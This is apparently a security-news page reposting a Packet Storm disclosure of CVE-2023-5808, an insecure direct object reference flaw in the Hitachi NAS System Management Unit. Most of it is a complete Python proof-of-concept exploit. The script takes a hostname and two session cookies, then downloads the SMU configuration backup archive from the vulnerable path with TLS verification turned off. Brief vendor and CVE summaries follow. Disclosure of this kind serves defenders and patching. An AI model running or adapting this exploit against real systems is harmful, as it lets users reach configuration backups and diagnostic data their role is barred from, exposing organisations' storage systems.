Security
Headlines
HeadlinesLatestCVEs

Headline

Hitachi NAS SMU Backup And Restore Insecure Direct Object Reference

Hitachi NAS SMU Backup and Restore versions prior to 14.8.7825.01 suffer from an insecure direct object reference vulnerability.

Packet Storm
#vulnerability#web#linux#js#auth#firefox
#!/usr/bin/python3## Title:            Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore IDOR Vulnerability # CVE:              CVE-2023-5808# Date:             2023-12-13# Exploit Author:   Arslan Masood (@arszilla)# Vendor:           https://www.hitachivantara.com/# Version:          < 14.8.7825.01# Tested On:        13.9.7021.04        import argparsefrom datetime import datetimefrom os import getcwdimport requestsparser = argparse.ArgumentParser(    description="CVE-2023-5808 PoC",    usage="./CVE-2023-5808.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>"    )# Create --host argument:parser.add_argument(    "--host",    required=True,    type=str,    help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443"    )# Create --id argument:parser.add_argument(    "--id",    required=True,    type=str,    help="JSESSIONID cookie value"    )# Create --sso argument:parser.add_argument(    "--sso",    required=True,    type=str,    help="JSESSIONIDSSO cookie value"    )args = parser.parse_args()def download_file(hostname, jsessionid, jsessionidsso):    # Set the filename:    filename = f"smu_backup-{datetime.now().strftime('%Y-%m-%d_%H%M')}.zip"    # Vulnerable SMU URL:    smu_url = f"https://{hostname}/mgr/app/template/simple%2CBackupSmuScreen.vm/password/"    # GET request cookies    smu_cookies = {        "JSESSIONID":       jsessionid,        "JSESSIONIDSSO":    jsessionidsso        }    # GET request headers:    smu_headers = {        "User-Agent":                   "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0",        "Accept":                       "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",        "Accept-Language":              "en-US,en;q=0.5",        "Accept-Encoding":              "gzip, deflate",        "Dnt":                          "1",        "Referer":                      f"https://{hostname}/mgr/app/action/admin.SmuBackupRestoreAction/eventsubmit_doperform/ignored",        "Upgrade-Insecure-Requests":    "1",        "Sec-Fetch-Dest":               "document",        "Sec-Fetch-Mode":               "navigate",        "Sec-Fetch-Site":               "same-origin",        "Sec-Fetch-User":               "?1",        "Te":                           "trailers",        "Connection":                   "close"        }    # Send the request:    with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download:        with open(filename, 'wb') as backup_archive:            # Write the zip file to the CWD:            backup_archive.write(file_download.content)    print(f"{filename} has been downloaded to {getcwd()}")if __name__ == "__main__":    download_file(args.host, args.id, args.sso)

Related news

CVE-2023-5808: Hitachi Vantara Support

Information disclosure in SMU in Hitachi Vantara HNAS 14.8.7825.01 on Windows allows authenticated users to download sensitive files via Insecure Direct Object Reference (IDOR).

CVE-2023-5808

SMU versions prior to 14.8.7825.01 are susceptible to unintended information disclosure, through URL manipulation. Authenticated users in a Storage administrative role are able to access HNAS configuration backup and diagnostic data, that would normally be barred to that specific administrative role.

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution